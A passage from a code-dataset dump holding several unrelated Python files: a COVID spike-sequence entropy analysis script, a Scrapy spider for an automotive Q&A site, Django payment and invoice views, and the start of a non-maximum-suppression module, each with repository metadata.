ndxtop]\n ## sites of the largest entropy\n esites.extend(etopsites[:args.sites])\n esites = list(dict.fromkeys(esites)) ## removes dups while maintaining order\n\n v.vprint(\"Observing\",len(esites),title)\n v.vprint(\"Observing\",len(esites),\"sites:\",esites)\n v.vprint(\"Observing\",len(esites),\"sites:\",sorted(esites))\n\n ## Make entropy plot\n if args.plot or args.writeplot:\n plt.figure()\n ## entropy vs site for all sites ... in default color (blue)\n siterange = [T.site_from_index(n) for n in range(M)]\n plt.plot(siterange,E)\n #plt.plot(range(1,M+1),E)\n plt.xlabel(\"Site index\")\n plt.ylabel(\"Entropy\")\n plt.title(title)\n ## entropy at specified sites ... in red\n for e in esites:\n ndx = T.index_from_site(e)\n plt.plot([e,e],[0,E[ndx]],'r-')\n\n if args.writeplot:\n plt.savefig(filename_prepend(\"entrpy-\",args.writeplot))\n\n print(\"Highest entropy sites for:\",title)\n print(\" Site Entropy\")\n for e in esites:\n n = T.index_from_site(e)\n print(\"%6d %7.4f\" % (e,E[n]))\n\n #### PAIRWISE ANALYSIS\n if args.pairs:\n charsatsite=dict()\n mutname = dict()\n for e in esites:\n ## don't strip x's quite yet\n n = T.index_from_site(e)\n charsatsite[e] = sequtil.getcolumn(seqs,n,keepx=True)\n mutname[e] = str(e)\n pairwise(args,esites,charsatsite,mutname,title=title)\n\n #### COMMON PATTERNS\n\n ## baseline mutation for mstrings\n base_mut = mutant.Mutation(covid.get_baseline_mstring(args.baseline))\n\n print()\n print(\"Most common patterns for local area, where Local =\",title)\n if not args.nomutlist and args.baseline:\n print(f\"Context is relative to baseline sequence = {args.baseline}: {base_mut}\")\n esites = sorted(esites)\n for lines in intlist.write_numbers_vertically(esites,plusone=0):\n print(lines)\n\n pattseqs = sequtil.copy_seqlist(seqs)\n ndxsites = [T.index_from_site(e) for e in esites]\n for s in pattseqs:\n s.seq = \"\".join(s.seq[n] for n in ndxsites)\n cnt = Counter([s.seq for s in pattseqs])\n\n ## Do not include patterns with X's in them\n ## set count[patt]=0 if \"X\" in patt\n ## one-liner: cnt = { patt: cnt[patt] * bool(\"X\" not in patt) for patt in cnt }\n ## alt: cnt = Counter({patt: cnt[patt] for patt in cnt if 'X' not in patt})\n for patt in cnt:\n if 'X' in patt:\n cnt[patt]=0\n\n patternlist = sorted(cnt, key=cnt.get, reverse=True)\n v.vvprint(\"Sums:\",args.filterbyname,len(seqs),sum(cnt.values()))\n\n #### Get counts for the various continents\n #### Use all the sequences, not just those that fit pattern\n allseqs = 
list(allseqs)[1:] ## don't keep the reference sequence\n\n cont_cnt = dict() ## cnt's for the various continents\n cont_sum = dict()\n Cxcx = covid.parse_continents()\n for cx,c,x in [(\"Global\",\"Global\",\"\")] + Cxcx:\n cseqs = sequtil.filter_by_pattern(allseqs,c)\n if x:\n cseqs = sequtil.filter_by_pattern_exclude(cseqs,x)\n cseqs = list(cseqs)\n #if c == \"Global\":\n # print(\"Global cseqs=\",len(cseqs))\n\n cont_cnt[c] = Counter(sequtil.multicolumn(cseqs,ndxsites,\n keepx=True))\n cont_sum[c] = len(cseqs)\n v.vvprint(\"Sums:\",c,cont_sum[c],sum(cont_cnt[c].values()))\n\n master = \"\".join(firstseq[n] for n in ndxsites)\n \n print(master,\" Global\",\n \" \".join(\"%6s\" % covid.ABBREV_CONTINENTS[cx] for cx,_,_ in Cxcx),\n \" Local\",\n \" Exact Pct [Context]\" if not args.nomutlist else \"\")\n\n ## Totals do not include sequences with X at any of the high-entropy sites\n print(\" \"*len(master),\"%7d\" % sum(cont_cnt['Global'].values()),\n \" \".join([\"%6d\" % sum(cont_cnt[c].values()) for _,c,_ in Cxcx]),\n \"%7d\"% sum(cnt.values()),\"<----------- Totals\" ) ## Totals\n\n if args.colormut:\n svar = SpikeVariants.from_colormut(args.colormut,refseq=firstseq)\n else:\n svar = SpikeVariants.default(refseq=firstseq)\n def get_lineage(seq):\n vocs = svar.vocmatch(seq)\n return \", \".join(v.name for v in vocs)\n\n ## dict indexes list of full sequences based on pattseq\n pattseqdict=defaultdict(list)\n for ps,s in zip(pattseqs,seqs):\n pattseqdict[ps.seq].append(s)\n\n for p in patternlist:\n\n if \"X\" in p:\n continue\n if cnt[p] < args.thresh:\n break\n print(\"%s %7d \" % (sequtil.relativename(master,p),\n cont_cnt[\"Global\"][p]),end=\"\")\n print(\" \".join(\"%6d\"% cont_cnt[c][p] for _,c,_ in Cxcx),end=\"\")\n print(\" %7d\" % cnt[p],end=\"\")\n\n ## What is the context for this pattern\n if args.nomutlist:\n print()\n else:\n ## count full seq's consistent with pattern p\n pcnt = Counter(s.seq for s in pattseqdict[p])\n [(pcommonseq,npcs)] = pcnt.most_common(1)\n lineage_name = get_lineage(pcommonseq)\n mut = T.get_mutation(pcommonseq)\n mstring = mut.relative_to(base_mut) if args.baseline else str(mut)\n print(f\" {npcs:6d} {100*npcs//cnt[p]:3d}% {mstring} {lineage_name}\")\n\n\n\nif __name__ == \"__main__\":\n\n args = getargs()\n v.verbosity(args.verbose)\n\n def vcount(seqs,*p,**kw):\n if args.verbose:\n return wrapgen.keepcount(seqs,*p,**kw)\n else:\n return seqs\n\n main(args)\n if args.plot:\n plt.show()\n", "repo_name": "jt-lanl/cov-voc", "sub_path": "xspike.py", "file_name": "xspike.py", "file_ext": "py", "file_size_in_byte": 15301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 30, "usage_type": "call"}, {"api_name": "covid.corona_args", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 90, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 92, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 94, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": 
"numpy.sum", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 115, "usage_type": "call"}, {"api_name": "verbose.verbose.print", "line_number": 117, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 117, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 118, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 118, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 119, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 119, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 120, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 120, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 121, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 121, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 122, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 122, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 123, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 123, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 124, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 124, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 125, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 125, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 127, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 127, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 128, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.stats.chi2_contingency", "line_number": 136, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 136, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 139, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 139, "usage_type": "name"}, {"api_name": "verbose.verbose.print", "line_number": 140, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.stats.entropy", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 146, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.stats.entropy", "line_number": 147, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 147, "usage_type": "call"}, {"api_name": "scipy.stats.entropy", "line_number": 148, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 148, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 159, "usage_type": "call"}, {"api_name": "covid.get_title", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 176, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 177, "usage_type": "call"}, {"api_name": 
"verbose.verbose.vvprint", "line_number": 185, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 185, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 186, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 186, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 187, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 187, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 188, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 188, "usage_type": "name"}, {"api_name": "verbose.verbose.vvprint", "line_number": 189, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 189, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 189, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 190, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 190, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 190, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 191, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 191, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 191, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 193, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 193, "usage_type": "name"}, {"api_name": "numpy.diag", "line_number": 197, "usage_type": "call"}, {"api_name": "xspikeplots.heatmap", "line_number": 198, "usage_type": "name"}, {"api_name": "xspikeplots.circleplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "itertools.combinations", "line_number": 214, "usage_type": "call"}, {"api_name": "verbose.verbose.print", "line_number": 228, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 228, "usage_type": "name"}, {"api_name": "covid.read_seqfile", "line_number": 230, "usage_type": "call"}, {"api_name": "covid.filter_seqs_by_date", "line_number": 232, "usage_type": "call"}, {"api_name": "covid.fix_seqs", "line_number": 234, "usage_type": "call"}, {"api_name": "covid.filter_seqs_by_pattern", "line_number": 236, "usage_type": "call"}, {"api_name": "covid.range_of_dates", "line_number": 251, "usage_type": "call"}, {"api_name": "verbose.verbose.vprint", "line_number": 256, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 256, "usage_type": "name"}, {"api_name": "random.choices", "line_number": 258, "usage_type": "call"}, {"api_name": "sequtil.chunked_entropy", "line_number": 259, "usage_type": "call"}, {"api_name": "verbose.verbose.vprint", "line_number": 260, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 260, "usage_type": "name"}, {"api_name": "mutant.MutationManager", "line_number": 262, "usage_type": "call"}, {"api_name": "intlist.string_to_intlist", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 268, "usage_type": 
"call"}, {"api_name": "covid.spike_sites", "line_number": 270, "usage_type": "call"}, {"api_name": "verbose.verbose.vprint", "line_number": 279, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 279, "usage_type": "name"}, {"api_name": "verbose.verbose.vprint", "line_number": 280, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 280, "usage_type": "name"}, {"api_name": "verbose.verbose.vprint", "line_number": 281, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 296, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 296, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "sequtil.getcolumn", "line_number": 314, "usage_type": "call"}, {"api_name": "mutant.Mutation", "line_number": 321, "usage_type": "call"}, {"api_name": "covid.get_baseline_mstring", "line_number": 321, "usage_type": "call"}, {"api_name": "intlist.write_numbers_vertically", "line_number": 328, "usage_type": "call"}, {"api_name": "sequtil.copy_seqlist", "line_number": 331, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 335, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 346, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 346, "usage_type": "name"}, {"api_name": "covid.parse_continents", "line_number": 354, "usage_type": "call"}, {"api_name": "sequtil.filter_by_pattern", "line_number": 356, "usage_type": "call"}, {"api_name": "sequtil.filter_by_pattern_exclude", "line_number": 358, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 363, "usage_type": "call"}, {"api_name": "sequtil.multicolumn", "line_number": 363, "usage_type": "call"}, {"api_name": "verbose.verbose.vvprint", "line_number": 366, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 366, "usage_type": "name"}, {"api_name": "covid.ABBREV_CONTINENTS", "line_number": 371, "usage_type": "attribute"}, {"api_name": "spikevariants.SpikeVariants.from_colormut", "line_number": 381, "usage_type": "call"}, {"api_name": "spikevariants.SpikeVariants", "line_number": 381, "usage_type": "name"}, {"api_name": "spikevariants.SpikeVariants.default", "line_number": 383, "usage_type": "call"}, {"api_name": "spikevariants.SpikeVariants", "line_number": 383, "usage_type": "name"}, {"api_name": "verbose.verbose.name", "line_number": 386, "usage_type": "attribute"}, {"api_name": "verbose.verbose", "line_number": 386, "usage_type": "name"}, {"api_name": 
"collections.defaultdict", "line_number": 389, "usage_type": "call"}, {"api_name": "sequtil.relativename", "line_number": 399, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 409, "usage_type": "call"}, {"api_name": "verbose.verbose.verbosity", "line_number": 421, "usage_type": "call"}, {"api_name": "verbose.verbose", "line_number": 421, "usage_type": "name"}, {"api_name": "wrapgen.keepcount", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 431, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 431, "usage_type": "name"}]} +{"seq_id": "41470634134", "text": "#!/usr/bin/env python\n# coding=utf-8\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request, Response\nfrom AutoComments.items import AutocommentsItem\nimport scrapy\n\ncount = 0\n\n\nclass Autohome2Spider(scrapy.Spider):\n\tname = \"autohome_spider\"\n\tprefix = 'http://wenda.autohome.com.cn'\n\tstart_urls = ['http://wenda.autohome.com.cn/topic/list-1-0-0-0-0-1', ]\n\n\t# 'http://wenda.autohome.com.cn/topic/list-2-0-0-0-0-1',\\\n\t# 'http://wenda.autohome.com.cn/topic/list-3-0-0-0-0-1',\\\n\t# 'http://wenda.autohome.com.cn/topic/list-4-0-0-0-0-1']\n\n\tdef parse(self, response):\n\t\tselector = Selector(response)\n\t\tprint('****************parse request url: %s status_code : %s ****************' % (\n\t\tselector.response.url, str(selector.response.status)))\n\t\tl2_urls = selector.xpath('//div[@class=\"classify\"][2]//div/a')\n\t\tif l2_urls:\n\t\t\tfor l2_url in l2_urls:\n\t\t\t\turl = self.prefix + l2_url.xpath('./@href').extract()[0]\n\t\t\t\tprint('****************请求 二级 标签首页: %s****************' % url)\n\t\t\t\tyield Request(url=url, callback=self.gen_all_reqs)\n\t\telse:\n\t\t\tprint('****************解析 一级 标签首页: %s****************' % selector.response.url)\n\t\t\tyield Request(url=selector.response.url, callback=self.parse_detail)\n\n\tdef gen_all_reqs(self, response):\n\t\tselector = Selector(response)\n\t\tprint('****************gen_all_reqs: request url: %s status_code : %s ****************' % (\n\t\tselector.response.url, str(selector.response.status)))\n\t\tl3_urls = selector.xpath('//div[@class=\"classify\"][3]//div/a')\n\t\tif l3_urls:\n\t\t\tfor l3_url in l3_urls:\n\t\t\t\turl = self.prefix + l3_url.xpath('./@href').extract()[0]\n\t\t\t\tprint('****************解析 三级 标签首页: %s****************' % url)\n\t\t\t\tyield Request(url=url, callback=self.parse_detail)\n\t\telse:\n\t\t\tprint('****************解析 二级 标签首页: %s****************' % selector.response.url)\n\t\t\tyield Request(url=selector.response.url, callback=self.parse_detail)\n\n\tdef parse_detail(self, response):\n\t\tglobal count\n\t\titem = AutocommentsItem()\n\t\tselector = Selector(response)\n\t\tprint('****************parse_detail request url: %s status_code : %s ****************' % (\n\t\tselector.response.url, str(selector.response.status)))\n\n\t\tprint('*********************开始抓取第 %d 页 %s 信息, status : %s' % (\n\t\tcount, selector.response.request, selector.response.status))\n\n\t\tl1_label = selector.xpath(\n\t\t\t'/html/body/div[3]/div/div[1]/div[1]/div[2]/div/a/span/em[@class=\"current\"]/text()').extract()\n\t\tif l1_label:\n\t\t\titem['l1label'] = l1_label[0]\n\t\telse:\n\t\t\titem['l1label'] = ''\n\n\t\tl2_label = selector.xpath(\n\t\t\t'/html/body/div[3]/div/div[1]/div[1]/div[3]/div/a/span/em[@class=\"current\"]/text()').extract()\n\t\tif l2_label:\n\t\t\titem['l2label'] = l2_label[0]\n\t\telse:\n\t\t\titem['l2label'] = ''\n\n\t\tl3_label 
= selector.xpath(\n\t\t\t'/html/body/div[3]/div/div[1]/div[1]/div[4]/div/a/span/em[@class=\"current\"]/text()').extract()\n\t\tif l3_label:\n\t\t\titem['l3label'] = l3_label[0]\n\t\telse:\n\t\t\titem['l3label'] = ''\n\n\t\tquestionlist = selector.xpath('/html/body/div[3]/div/div[1]/div[2]/ul/li/h4/a/text()').extract()\n\t\tprint(\"****************finished scraping page %d info %s | L1: %s | L2: %s | L3:%s****************\" % (\n\t\tcount, selector.response.url, item['l1label'], item['l2label'], item['l3label']))\n\t\tcount += 1\n\t\tif questionlist:\n\t\t\tprint(len(questionlist))\n\t\t\tfor question in questionlist:\n\t\t\t\titem['question'] = question\n\t\t\t\tyield item\n\t\tnextlink = selector.xpath('//a[@class=\"athm-page__next\"]/@href').extract()\n\t\tif nextlink:\n\t\t\tnextlink = self.prefix + nextlink[0]\n\t\t\tprint('****************start parsing next page %s info****************' % nextlink)\n\t\t\tyield Request(url=nextlink, callback=self.parse_detail)\n", "repo_name": "Cai1001/PythonScrapyProj", "sub_path": "AutoHomeSpider_v1.2/AutoComments/spiders/spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 3667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.Spider", "line_number": 12, "usage_type": "attribute"}, {"api_name": "scrapy.selector.Selector", "line_number": 22, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 30, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 33, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 36, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 44, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 47, "usage_type": "call"}, {"api_name": "AutoComments.items.AutocommentsItem", "line_number": 51, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 52, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "10757933047", "text": "from django.shortcuts import render, redirect\nfrom .models import PaymentGateway, Invoice, InvoiceDetails\nfrom product_module.models import CartItem, Product,Tax,Shipping_Cost\nfrom datetime import date, datetime\nfrom django.db import transaction\nfrom django.urls import reverse\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.conf import settings\nfrom django.utils.html import mark_safe\nfrom mail_templated import send_mail\n# Create your views here.\ndef confirmpayment(request):\n\tif request.method == \"POST\":\n\t\ttoken = request.POST.get(\"token\")\n\t\tamount = request.POST.get(\"amount\")\n\t\tcity = request.POST.get(\"city\")\n\t\taddress = request.POST.get(\"address\")\n\t\tcontact_no = request.POST.get(\"contact_no\")\n\t\t# clean up\n\t\ttoken = token.strip()\n\t\tamount = float(amount)\n\t\ttry:\n\t\t\twith transaction.atomic():\n\t\t\t\t# open an atomic transaction, i.e. all successful or none\n\t\t\t\tmake_payment(token, amount)\n\t\t\t\tmaintain_invoice(request, token, amount,city,address,contact_no)\n\t\texcept Exception as e:\n\t\t\trequest.session[\"message\"] = str(e)\n\t\t\treturn redirect(reverse('error_page'))\n\t\telse:\n\t\t\trequest.session[\"message\"] = f\"Payment successfully completed with NRs. 
{amount} from your balance!\"\n\t\t\treturn redirect(reverse('success_page'))\ndef make_payment(token, amount):\n\ttry:\n\t\tpayment_gateway = PaymentGateway.objects.get(token=token)\n\texcept:\n\t\traise Exception(f\"Invalid token '{token}'\")\n\t# Check if available amount is sufficient for payment\n\tif payment_gateway.balance < amount:\n\t\traise Exception(\"Insufficient balance\")\n\t# check for expiry date\n\tif payment_gateway.expiry_date < date.today():\n\t\traise Exception(\"Token has expired\")\n\t# deduct amount and save\n\tpayment_gateway.balance -= amount\n\tpayment_gateway.save()\n\ndef maintain_invoice(request, token, amount, city,address,contact_no):\n\t# retrieve cart items\n\tcart_items = CartItem.objects.filter(user=request.user)\n\t# save invoice\n\tinvoice = Invoice(\n\tuser = request.user,\n\ttoken = token,\n\ttotal_amount = amount,\n\tcity=city,\n\taddress=address,\n\tcontact_no = contact_no,\n\tpayment_date = datetime.now()\n\t)\n\tinvoice.save()\n\t# invoic_id = Invoice.objects.filter(user=request.user)\n\tfkid = invoice.id\n\t# save invoice detail\n\tfor cart_item in cart_items:\n\t\tinvoice_detail = InvoiceDetails(\n\t\tinvoice = invoice,\n\t\tproduct = cart_item.product,\n\t\tquantity = cart_item.quantity,\n\t\tsub_amount = cart_item.quantity * cart_item.product.price\n\t\t)\n\t\tinvoice_detail.save()\n\n\t# adjust product quantity and clear cart\n\tfor cart_item in cart_items:\n\t# reduce quantity from Product\n\t\tproduct = Product.objects.get(id=cart_item.product.id)\n\t\tif product.quantity < cart_item.quantity:\n\t\t\traise Exception(f\"Insufficient quantity {cart_item.quantity} for {product.name}\")\n\t\tproduct.quantity -= cart_item.quantity\n\t\tproduct.save()\n\t# clear cart for the user\n\t\tcart_item.delete()\n\torder_confirmation(request,fkid)\ndef order_confirmation(request,fkid):\n tax = Tax.objects.get(pk=1)\n invoice = Invoice.objects.get(pk=fkid)\n shipping = Shipping_Cost.objects.get(pk=1)\n invoice_details = InvoiceDetails.objects.filter(invoice_id=fkid)\n total =0\n for invoice_detail in invoice_details:\n total +=invoice_detail.sub_amount\n tax_amount =total*(tax.tax_rate_in_percentage/100)\n user = request.user\n send_mail('bill.tpl', {'user': user,'invoice_details':invoice_details,'tax':tax,'tax_amount':tax_amount,'shipping':shipping,'invoice':invoice}, settings.EMAIL_HOST_USER, [user.email])\n # product=[]\n # text_content = \" \"\n # for invoice_detail in invoice_details:\n # text_content = f\"Name:{invoice_detail.product}\" \n\n # current_user = request.user\n # email = current_user.email\n # html_content = mark_safe(f\"{}\")\n # # text_content = strip_tags(html_content)\n\n # email = EmailMultiAlternatives(\n # \"Testing\",\n # html_content,\n # settings.EMAIL_HOST_USER,\n # [email]\n\n # )\n # email.attach_alternative(html_content,\"text/html\")\n # email.send()", "repo_name": "ayushkc007/Kitab_pasal", "sub_path": "ecommerce_project/payment_module/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.transaction.atomic", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.transaction", "line_number": 25, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 34, 
"usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "models.PaymentGateway.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.PaymentGateway.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.PaymentGateway", "line_number": 37, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 44, "usage_type": "name"}, {"api_name": "product_module.models.CartItem.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "product_module.models.CartItem.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "product_module.models.CartItem", "line_number": 52, "usage_type": "name"}, {"api_name": "models.Invoice", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "name"}, {"api_name": "models.InvoiceDetails", "line_number": 68, "usage_type": "call"}, {"api_name": "product_module.models.Product.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "product_module.models.Product.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "product_module.models.Product", "line_number": 79, "usage_type": "name"}, {"api_name": "product_module.models.Tax.objects.get", "line_number": 88, "usage_type": "call"}, {"api_name": "product_module.models.Tax.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "product_module.models.Tax", "line_number": 88, "usage_type": "name"}, {"api_name": "models.Invoice.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "models.Invoice.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.Invoice", "line_number": 89, "usage_type": "name"}, {"api_name": "product_module.models.Shipping_Cost.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "product_module.models.Shipping_Cost.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "product_module.models.Shipping_Cost", "line_number": 90, "usage_type": "name"}, {"api_name": "models.InvoiceDetails.objects.filter", "line_number": 91, "usage_type": "call"}, {"api_name": "models.InvoiceDetails.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.InvoiceDetails", "line_number": 91, "usage_type": "name"}, {"api_name": "mail_templated.send_mail", "line_number": 97, "usage_type": "call"}, {"api_name": "django.conf.settings.EMAIL_HOST_USER", "line_number": 97, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 97, "usage_type": "name"}]} +{"seq_id": "74287434754", "text": "\"\"\"\n.. module:: felzenszwalb\n :synopsis: Felzenszwalb et al implementation of NMS\n\n.. moduleauthor:: tom hoag \n\nFelzenszwalb et al implementation of NMS\n\nThe functions in this module are not usually called directly. 
Instead use :func:`nms.nms.boxes`,\n:func:`nms.nms.rboxes`, or :func:`nms.nms.polygons`\n\n\n\"\"\"\nimport numpy as np\nimport cv2\n\nimport nms.helpers as help\n\n\ndef rect_areas(rects):\n    \"\"\"Return an np.array of the areas of the rectangles\n\n    :param rects: a list of rectangles, each specified as (x, y, w, h)\n    :type rects: list\n    :return: a numpy array of corresponding areas\n    :rtype: :class:`numpy.ndarray`\n    \"\"\"\n    # rect = x,y,w,h\n    rects = np.array(rects)\n    w = rects[:,2]\n    h = rects[:,3]\n    return w * h\n\n\ndef rect_compare(rect1, rect2, area):\n    \"\"\"Calculate the ratio of overlap between two rectangles and the given area\n\n    :param rect1: rectangle specified as (x, y, w, h)\n    :type rect1: tuple\n    :param rect2: rectangle specified as (x, y, w, h)\n    :type rect2: tuple\n    :param area: the area to compare to\n    :type area: float\n    :return: the ratio of the overlap of rect1 and rect2 to the area, e.g overlap(rect1, rect2)/area\n    :rtype: float\n    